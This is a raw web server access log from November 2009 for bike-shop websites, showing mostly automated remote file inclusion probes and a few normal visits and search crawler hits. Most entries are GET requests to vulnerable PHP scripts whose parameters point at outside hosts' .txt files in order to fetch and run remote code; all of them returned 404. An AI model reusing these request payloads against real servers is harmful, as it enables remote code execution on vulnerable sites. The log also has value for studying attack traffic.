77.221.130.17 - - [11/Nov/2009:07:43:35 -0800] "GET //appserv/main.php?appserv_root=http://www.aresmu.com////appserv/AUTHORS.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.221.130.17 - - [11/Nov/2009:07:43:35 -0800] "GET /logs///appserv/main.php?appserv_root=http://www.aresmu.com////appserv/AUTHORS.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.221.130.17 - - [11/Nov/2009:07:43:45 -0800] "GET //appserv/main.php?appserv_root=http://www.aresmu.com////appserv/AUTHORS.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.221.130.17 - - [11/Nov/2009:07:43:45 -0800] "GET /logs/access.log///appserv/main.php?appserv_root=http://www.aresmu.com////appserv/AUTHORS.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.221.130.17 - - [11/Nov/2009:07:43:45 -0800] "GET /logs///appserv/main.php?appserv_root=http://www.aresmu.com////appserv/AUTHORS.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.79.101.98 - - [11/Nov/2009:07:44:51 -0800] "GET /translations/Polish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.79.101.98 - - [11/Nov/2009:07:44:51 -0800] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.79.101.98 - - [11/Nov/2009:07:44:51 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.79.101.98 - - [11/Nov/2009:07:44:51 -0800] "GET /translations/Portuguese.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.221.130.17 - - [11/Nov/2009:07:45:18 -0800] "GET /logs/access.log%20%20///appserv/main.php?appserv_root=http://www.aresmu.com////appserv/AUTHORS.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.221.130.17 - - [11/Nov/2009:07:45:21 -0800] "GET /logs/access.log%20%20///appserv/main.php?appserv_root=http://www.aresmu.com////appserv/AUTHORS.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.221.130.17 - - [11/Nov/2009:07:46:22 -0800] "GET /logs/access.log%20%20///appserv/main.php?appserv_root=http://www.aresmu.com////appserv/AUTHORS.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
221.139.3.168 - - [11/Nov/2009:07:46:44 -0800] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://come.kr/bbs/data2/images/id1(feelcomz).txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
221.139.3.168 - - [11/Nov/2009:07:46:44 -0800] "GET /skin/zero_vote/error.php?dir=http://come.kr/bbs/data2/images/id1(feelcomz).txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
221.139.3.168 - - [11/Nov/2009:07:46:44 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://come.kr/bbs/data2/images/id1(feelcomz).txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
92.50.143.90 - - [11/Nov/2009:07:53:00 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.ikant.co.kr///data/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
92.50.143.90 - - [11/Nov/2009:07:53:00 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.ikant.co.kr///data/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
92.50.143.90 - - [11/Nov/2009:07:53:01 -0800] "GET /logs/access.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.ikant.co.kr///data/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
92.50.143.90 - - [11/Nov/2009:07:55:00 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.ikant.co.kr///data/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
92.50.143.90 - - [11/Nov/2009:07:55:00 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.ikant.co.kr///data/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
92.50.143.90 - - [11/Nov/2009:07:55:13 -0800] "GET /logs/access.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.ikant.co.kr///data/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
92.50.143.90 - - [11/Nov/2009:08:03:49 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.ikant.co.kr///data/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
92.50.143.90 - - [11/Nov/2009:08:03:52 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.ikant.co.kr///data/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
221.139.3.168 - - [11/Nov/2009:08:04:53 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://come.kr/bbs/data2/images/id1(feelcomz).txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
92.50.143.90 - - [11/Nov/2009:08:07:28 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.ikant.co.kr///data/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
12.169.83.233 - - [11/Nov/2009:08:08:03 -0800] "GET / HTTP/1.0" 200 1748 "http://locator.trekbikes.com/locator/search" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1)" "www.svbikes.com"
12.169.83.233 - - [11/Nov/2009:08:08:04 -0800] "GET /favicon.ico HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1)" "www.svbikes.com"
213.79.101.98 - - [11/Nov/2009:08:09:58 -0800] "GET /translations/Portuguese.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.79.101.98 - - [11/Nov/2009:08:09:58 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.79.101.98 - - [11/Nov/2009:08:09:58 -0800] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.79.101.98 - - [11/Nov/2009:08:09:58 -0800] "GET /translations/Polish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
92.50.143.90 - - [11/Nov/2009:08:13:25 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.ikant.co.kr///data/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
92.50.143.90 - - [11/Nov/2009:08:13:25 -0800] "GET /logs/access.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.ikant.co.kr///data/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
92.50.143.90 - - [11/Nov/2009:08:13:25 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.ikant.co.kr///data/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
92.50.143.90 - - [11/Nov/2009:08:13:34 -0800] "GET /logs/access.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.ikant.co.kr///data/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
92.50.143.90 - - [11/Nov/2009:08:13:34 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.ikant.co.kr///data/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
92.50.143.90 - - [11/Nov/2009:08:13:34 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.ikant.co.kr///data/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
92.50.143.90 - - [11/Nov/2009:08:17:58 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.ikant.co.kr///data/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
92.50.143.90 - - [11/Nov/2009:08:17:58 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.ikant.co.kr///data/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
92.50.143.90 - - [11/Nov/2009:08:17:58 -0800] "GET /logs/access.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.ikant.co.kr///data/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
92.50.143.90 - - [11/Nov/2009:08:19:15 -0800] "GET /logs/access.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.ikant.co.kr///data/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
78.110.50.121 - - [11/Nov/2009:08:19:26 -0800] "GET /tools/send_reminders.php?includedir=http://adoptablez.com/templates/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
78.110.50.121 - - [11/Nov/2009:08:19:26 -0800] "GET /logs/access.log//tools/send_reminders.php?includedir=http://adoptablez.com/templates/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
78.110.50.121 - - [11/Nov/2009:08:19:26 -0800] "GET /logs//tools/send_reminders.php?includedir=http://adoptablez.com/templates/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
78.110.50.121 - - [11/Nov/2009:08:19:27 -0800] "GET /tools/send_reminders.php?includedir=http://adoptablez.com/templates/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
78.110.50.121 - - [11/Nov/2009:08:19:27 -0800] "GET /logs//tools/send_reminders.php?includedir=http://adoptablez.com/templates/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
78.110.50.121 - - [11/Nov/2009:08:19:27 -0800] "GET /logs/access.log//tools/send_reminders.php?includedir=http://adoptablez.com/templates/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
78.110.50.121 - - [11/Nov/2009:08:19:37 -0800] "GET /tools/send_reminders.php?includedir=http://adoptablez.com/templates/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
78.110.50.121 - - [11/Nov/2009:08:19:37 -0800] "GET /logs//tools/send_reminders.php?includedir=http://adoptablez.com/templates/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
78.110.50.121 - - [11/Nov/2009:08:19:37 -0800] "GET /logs/access.log%20%20//tools/send_reminders.php?includedir=http://adoptablez.com/templates/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
78.110.50.121 - - [11/Nov/2009:08:19:44 -0800] "GET /logs//tools/send_reminders.php?includedir=http://adoptablez.com/templates/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
78.110.50.121 - - [11/Nov/2009:08:19:44 -0800] "GET /tools/send_reminders.php?includedir=http://adoptablez.com/templates/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
78.110.50.121 - - [11/Nov/2009:08:19:44 -0800] "GET /logs/access.log%20%20//tools/send_reminders.php?includedir=http://adoptablez.com/templates/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
92.50.143.90 - - [11/Nov/2009:08:21:10 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.ikant.co.kr///data/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
92.50.143.90 - - [11/Nov/2009:08:21:10 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.ikant.co.kr///data/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
92.50.143.90 - - [11/Nov/2009:08:21:10 -0800] "GET /logs/access.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.ikant.co.kr///data/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
78.110.50.121 - - [11/Nov/2009:08:21:20 -0800] "GET /tools/send_reminders.php?includedir=http://adoptablez.com/templates/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
78.110.50.121 - - [11/Nov/2009:08:21:20 -0800] "GET /logs//tools/send_reminders.php?includedir=http://adoptablez.com/templates/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
78.110.50.121 - - [11/Nov/2009:08:21:20 -0800] "GET /logs/access.log//tools/send_reminders.php?includedir=http://adoptablez.com/templates/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
78.110.50.121 - - [11/Nov/2009:08:21:20 -0800] "GET /logs//tools/send_reminders.php?includedir=http://adoptablez.com/templates/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
78.110.50.121 - - [11/Nov/2009:08:21:20 -0800] "GET /tools/send_reminders.php?includedir=http://adoptablez.com/templates/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
78.110.50.121 - - [11/Nov/2009:08:21:20 -0800] "GET /logs/access.log//tools/send_reminders.php?includedir=http://adoptablez.com/templates/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
114.80.93.71 - - [11/Nov/2009:08:24:05 -0800] "GET / HTTP/1.1" 200 1764 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "bicyclestoreshouston.com"
92.50.143.90 - - [11/Nov/2009:08:26:23 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.ikant.co.kr///data/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
92.50.143.90 - - [11/Nov/2009:08:26:23 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.ikant.co.kr///data/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
92.50.143.90 - - [11/Nov/2009:08:26:23 -0800] "GET /logs/access.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.ikant.co.kr///data/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
80.91.189.9 - - [11/Nov/2009:08:40:40 -0800] "GET /skin/ggambo7002_board/setup.php?dir=http://idkat.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
80.91.189.9 - - [11/Nov/2009:08:40:40 -0800] "GET /logs/access.log%20%20//skin/ggambo7002_board/setup.php?dir=http://idkat.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
80.91.189.9 - - [11/Nov/2009:08:40:40 -0800] "GET /logs//skin/ggambo7002_board/setup.php?dir=http://idkat.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
80.91.189.9 - - [11/Nov/2009:08:40:40 -0800] "GET /skin/ggambo7002_board/setup.php?dir=http://idkat.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
80.91.189.9 - - [11/Nov/2009:08:40:40 -0800] "GET /logs//skin/ggambo7002_board/setup.php?dir=http://idkat.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
80.91.189.9 - - [11/Nov/2009:08:40:40 -0800] "GET /logs/access.log%20%20//skin/ggambo7002_board/setup.php?dir=http://idkat.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.113.3.106 - - [11/Nov/2009:08:44:40 -0800] "GET /skin/ggambo7002_board/setup.php?dir=http://idkat.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.113.3.106 - - [11/Nov/2009:08:44:40 -0800] "GET /logs/access.log%20%20//skin/ggambo7002_board/setup.php?dir=http://idkat.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.113.3.106 - - [11/Nov/2009:08:44:40 -0800] "GET /logs//skin/ggambo7002_board/setup.php?dir=http://idkat.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
114.4.8.14 - - [11/Nov/2009:08:45:13 -0800] "GET //registration_detailed.inc.php?mosConfig_absolute_path=http://n34.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
114.4.8.14 - - [11/Nov/2009:08:45:15 -0800] "GET /logs/access.log%20%20///registration_detailed.inc.php?mosConfig_absolute_path=http://n34.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
114.4.8.14 - - [11/Nov/2009:08:45:15 -0800] "GET /logs///registration_detailed.inc.php?mosConfig_absolute_path=http://n34.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.113.3.106 - - [11/Nov/2009:08:48:59 -0800] "GET /logs/access.log%20%20//skin/ggambo7002_board/setup.php?dir=http://idkat.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.113.3.106 - - [11/Nov/2009:08:48:59 -0800] "GET /logs//skin/ggambo7002_board/setup.php?dir=http://idkat.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.113.3.106 - - [11/Nov/2009:08:48:59 -0800] "GET /skin/ggambo7002_board/setup.php?dir=http://idkat.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
114.4.8.14 - - [11/Nov/2009:08:49:41 -0800] "GET /logs/access.log///registration_detailed.inc.php?mosConfig_absolute_path=http://n34.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.113.3.106 - - [11/Nov/2009:08:51:29 -0800] "GET /logs/access.log//skin/ggambo7002_board/setup.php?dir=http://idkat.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.113.3.106 - - [11/Nov/2009:08:51:29 -0800] "GET /logs//skin/ggambo7002_board/setup.php?dir=http://idkat.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.113.3.106 - - [11/Nov/2009:08:51:29 -0800] "GET /skin/ggambo7002_board/setup.php?dir=http://idkat.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.113.3.106 - - [11/Nov/2009:08:53:19 -0800] "GET /logs//skin/ggambo7002_board/setup.php?dir=http://idkat.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
222.236.47.182 - - [11/Nov/2009:08:53:39 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://creative-alchemy.com/zencart//media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
222.236.47.182 - - [11/Nov/2009:08:53:39 -0800] "GET /logs/access.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://creative-alchemy.com/zencart//media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
222.236.47.182 - - [11/Nov/2009:08:53:40 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://creative-alchemy.com/zencart//media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.113.3.106 - - [11/Nov/2009:08:54:07 -0800] "GET /skin/ggambo7002_board/setup.php?dir=http://idkat.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.113.3.106 - - [11/Nov/2009:08:54:07 -0800] "GET /logs//skin/ggambo7002_board/setup.php?dir=http://idkat.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.113.3.106 - - [11/Nov/2009:08:54:07 -0800] "GET /logs/access.log//skin/ggambo7002_board/setup.php?dir=http://idkat.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
72.232.167.73 - - [11/Nov/2009:08:59:33 -0800] "GET /logs/access.log//bbs//skin/ggambo7002_board/write.php?dir=http://www.krieke.nl//Beta/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
72.232.167.73 - - [11/Nov/2009:08:59:33 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.krieke.nl//Beta/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
72.232.167.73 - - [11/Nov/2009:08:59:33 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://www.krieke.nl//Beta/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.247.200.12 - - [11/Nov/2009:08:59:38 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.krieke.nl//Beta/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.247.200.12 - - [11/Nov/2009:08:59:38 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://www.krieke.nl//Beta/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.247.200.12 - - [11/Nov/2009:08:59:38 -0800] "GET /logs/access.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.krieke.nl//Beta/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
66.244.236.249 - - [11/Nov/2009:09:29:29 -0800] "GET /logs/access.log///skin/happycast_news/setup.php?dir=http://n34.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
66.244.236.249 - - [11/Nov/2009:09:29:29 -0800] "GET //skin/happycast_news/setup.php?dir=http://n34.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
66.244.236.249 - - [11/Nov/2009:09:29:29 -0800] "GET /logs///skin/happycast_news/setup.php?dir=http://n34.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
66.244.236.249 - - [11/Nov/2009:09:29:33 -0800] "GET /logs///skin/happycast_news/setup.php?dir=http://n34.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
66.244.236.249 - - [11/Nov/2009:09:29:33 -0800] "GET /logs/access.log///skin/happycast_news/setup.php?dir=http://n34.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
66.244.236.249 - - [11/Nov/2009:09:29:33 -0800] "GET //skin/happycast_news/setup.php?dir=http://n34.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
66.244.236.249 - - [11/Nov/2009:09:30:27 -0800] "GET /logs/access.log%20%20///skin/happycast_news/setup.php?dir=http://n34.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
66.244.236.249 - - [11/Nov/2009:09:30:29 -0800] "GET /logs/access.log%20%20///skin/happycast_news/setup.php?dir=http://n34.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
222.236.47.182 - - [11/Nov/2009:09:31:00 -0800] "GET /logs/access.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://creative-alchemy.com/zencart//media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
81.19.66.38 - - [11/Nov/2009:09:31:17 -0800] "GET /bullitinboard/viewtopic.php?p=1663 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [11/Nov/2009:09:31:18 -0800] "GET /bullitinboard/viewtopic.php?p=1968 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [11/Nov/2009:09:31:18 -0800] "GET /bullitinboard/viewtopic.php?p=2005 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [11/Nov/2009:09:31:19 -0800] "GET /bullitinboard/viewtopic.php?p=2036 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [11/Nov/2009:09:31:19 -0800] "GET /bullitinboard/viewtopic.php?p=1624 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
65.55.106.108 - - [11/Nov/2009:09:32:49 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "bicyclestoreshouston.com"
65.55.106.108 - - [11/Nov/2009:09:33:54 -0800] "GET / HTTP/1.1" 200 1764 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "bicyclestoreshouston.com"
81.19.67.243 - - [11/Nov/2009:09:34:35 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
114.4.8.14 - - [11/Nov/2009:09:40:31 -0800] "GET /logs///toolbar_ext.php?mosConfig_absolute_path=http://n34.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
114.4.8.14 - - [11/Nov/2009:09:40:31 -0800] "GET //toolbar_ext.php?mosConfig_absolute_path=http://n34.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
114.4.8.14 - - [11/Nov/2009:09:40:31 -0800] "GET /logs/access.log%20%20///toolbar_ext.php?mosConfig_absolute_path=http://n34.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
114.4.8.14 - - [11/Nov/2009:09:40:41 -0800] "GET /logs///toolbar_ext.php?mosConfig_absolute_path=http://n34.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
114.4.8.14 - - [11/Nov/2009:09:40:41 -0800] "GET //toolbar_ext.php?mosConfig_absolute_path=http://n34.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
114.4.8.14 - - [11/Nov/2009:09:40:41 -0800] "GET /logs/access.log%20%20///toolbar_ext.php?mosConfig_absolute_path=http://n34.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
